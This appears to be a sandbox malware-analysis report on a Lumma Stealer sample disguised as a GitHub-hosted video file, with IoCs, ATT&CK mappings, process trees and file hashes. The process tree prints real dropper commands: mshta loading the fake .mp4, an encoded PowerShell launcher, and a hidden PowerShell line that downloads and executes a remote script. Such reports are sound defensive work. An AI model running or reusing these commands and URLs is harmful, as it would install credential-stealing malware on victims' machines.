lumma | hxxps://github[.]com/git62025/movie/releases/download/movie2/blueredgreen[.]mp4

Resubmissions

06/01/2025, 21:28

250106-1bpz8sykez 10

06/01/2025, 21:25

250106-z9lvssyjft 4

Analysis

max time kernel
599s
max time network
589s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
06/01/2025, 21:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://klipdohesoo.shop/ruwin.png

Extracted

Language

hta

Source

URLs

hta.dropper

https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4/1

Extracted

Family

lumma

https://rainywearyrs.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1108 created 3624	1108	powershell.exe	57
PID 1396 created 3624	1396	powershell.exe	57

Blocklisted process makes network request 18 IoCs

flow	pid	Process
32	784	mshta.exe
36	784	mshta.exe
39	784	mshta.exe
43	784	mshta.exe
47	784	mshta.exe
48	784	mshta.exe
63	1108	powershell.exe
65	2260	mshta.exe
66	2260	mshta.exe
67	2260	mshta.exe
68	1396	powershell.exe
75	5352	powershell.exe
85	5352	powershell.exe
88	5352	powershell.exe
95	5140	mshta.exe
96	5852	powershell.exe
106	5852	powershell.exe
107	5852	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1108	powershell.exe
1396	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3506525125-3566313221-3651816328-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1108 set thread context of 5352	1108	powershell.exe	118
PID 1396 set thread context of 5852	1396	powershell.exe	120

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133806725361453497"	chrome.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1832	chrome.exe
1832	chrome.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
404	powershell.exe
404	powershell.exe
404	powershell.exe
1396	powershell.exe
1396	powershell.exe
1396	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1396	powershell.exe
1396	powershell.exe
1396	powershell.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1832	chrome.exe
1832	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeShutdownPrivilege	1832	chrome.exe
Token: SeCreatePagefilePrivilege	1832	chrome.exe
Token: SeDebugPrivilege	1108	powershell.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe
1832	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 3952	1832	chrome.exe	81
PID 1832 wrote to memory of 3952	1832	chrome.exe	81
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 3080	1832	chrome.exe	82
PID 1832 wrote to memory of 4520	1832	chrome.exe	83
PID 1832 wrote to memory of 4520	1832	chrome.exe	83
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84
PID 1832 wrote to memory of 4792	1832	chrome.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffb830ccc40,0x7ffb830ccc4c,0x7ffb830ccc58
    3⤵
    PID:3952
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=1916 /prefetch:2
    3⤵
    PID:3080
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1776,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2028 /prefetch:3
    3⤵
    PID:4520
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2284 /prefetch:8
    3⤵
    PID:4792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3180 /prefetch:1
    3⤵
    PID:1648
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:1200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4928,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4948 /prefetch:8
    3⤵
    PID:4160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5096,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5112 /prefetch:8
    3⤵
    PID:5100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5316,i,16980357413937904786,12812932503388737176,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5060 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5936
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAG8AaABlAHMAbwBvAC4AcwBoAG8AcAAvAHIAdQB3AGkAbgAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3868
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdohesoo.shop/ruwin.png'))"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1108
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAG8AaABlAHMAbwBvAC4AcwBoAG8AcAAvAHIAdQB3AGkAbgAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:404
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdohesoo.shop/ruwin.png'))"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:5352
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://github.com/git62025/movie/releases/download/movie2/blueredgreen.mp4/1
  2⤵
  - Blocklisted process makes network request
  PID:5140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:5852

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A66A8DB907BADC9D16AD67B2FBFFDD5C

Filesize
280B

MD5
2e3b1d2b0da7494926e7067a7991e358

SHA1
914240c551385528af738c7d2bed9815e052a2cc

SHA256
d7b0c95af78d110120730326382c5a515649524d0f13de07225dc8cacc9b62aa

SHA512
aa51a6802aecc21f8baa2488005c087db5ce727042439519433962e9eaaff566fed56b10183d7e3391ae3263c851a4299a3b72b46abdaee413110a59f59c9acb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25

Filesize
1KB

MD5
4cc23bd69b4215dfba3664e4d0b1d75c

SHA1
c79edc57f50a4004eaa43e1893f7142abfef85a2

SHA256
cc505155a962e87b4552eff6ca102695cee4749d28b52fe4a19eeec6897fffd0

SHA512
7e9d8de1ce62e75df424acdb6a3f1a7519f5cd9d50675af95474010cffd22deabcf14be578610adf11499279e280e0b9eebdeab25479fea204aad0c4e8fdaa94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90

Filesize
979B

MD5
d34ddf7764dfe4c53ad02658afa56d95

SHA1
82277ea579922dbd30b043753a531abb6dd65d9b

SHA256
1276ff418c0be079f2b88cc1230b9b49c2a7c47d4b703c5ef588f9e2d0aa2e1a

SHA512
cedfb5954bf40bbddb344677a5cf75f9af67c7d92c088c06ed82067436e9d7a49937398a10bac7611a77b90c02701a66319f83c504362e86d219d0bc4aba6c6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
5b8d892939b8ba2c1560d1e3e1e85673

SHA1
85fc1268b46372c30954cdc67f42ae46154e19a1

SHA256
452135f91422883defeb901ab369752f7ff35f4d286fa755d7f96a2ed440eba2

SHA512
88d8bd0e6fd17fdc1dba36d9e61946ad851d22deef34888e002886097b6dfac4c985ffe7e0b9181c3827793a052677717422cb0970a64bb43941258ce009a184

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A66A8DB907BADC9D16AD67B2FBFFDD5C

Filesize
480B

MD5
7ca442756c9bc6f958aaa7da6642fdc3

SHA1
7bed8cc397ffd591d47f6c92f78788c7ccd9985b

SHA256
b78ac93c90da5c0c56955224a56107c6d626f89ec3babb6c516c11f2340066e6

SHA512
3cf66085fc8ee51a9678c9ac8429ff769288c525bec156bc24ef5118fe6167a7ed4167bb19c88e38d01f835e8856606d0fcdecc7a61a1d2eb0ce22bba664e97c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_89854CA6A0F0936A4D2ECA78845CEA25

Filesize
482B

MD5
1a02545dc42e7dc55d4cb409367ac54d

SHA1
04f437e5b56bb4e3cb86bc2a6c4620e73dc0bd44

SHA256
1041f01c5aa4d89c56ed851c0625b04ac45d4fa84de33114a23901293d9c6e91

SHA512
2621032c7722aa61a2006e5d997f37ea866d8e5a0cd37512f0875b00a3cbd1a201a0cd3f49befd5db7f5a83434f14e8ac5a539ff237b3e8c82f4cedda159473e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D0E1C4B6144E7ECAB3F020E4A19EFC29_B5F77004C894173A10E3A199871D2D90

Filesize
480B

MD5
2aa8b5070d6d58b9b8d043d0a44d5c33

SHA1
357d51093f828c7dc05ad3848350987a6a3d1ba2

SHA256
2482c9f9a8c22d6dde572a9651c681bb419b46a52b98a222e9ab11c131d79d8a

SHA512
bf9e6c388b3af449da86ac9fa20869401f27a4ea10b3796f14f15eae99cdb6ee714b541d2fead45ce4ddaefe9a4f6ffa28dff724eaf6895147d0d756ef6b48a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
0989003ab3f791fa1c39b26ad55ca3a0

SHA1
76b2b2f5019b488d84ababc30fb1e9644376ea7b

SHA256
5254276cc49909e536fa9790f24faa6424943e7b8bdef864fd6ddd3ad0940f4c

SHA512
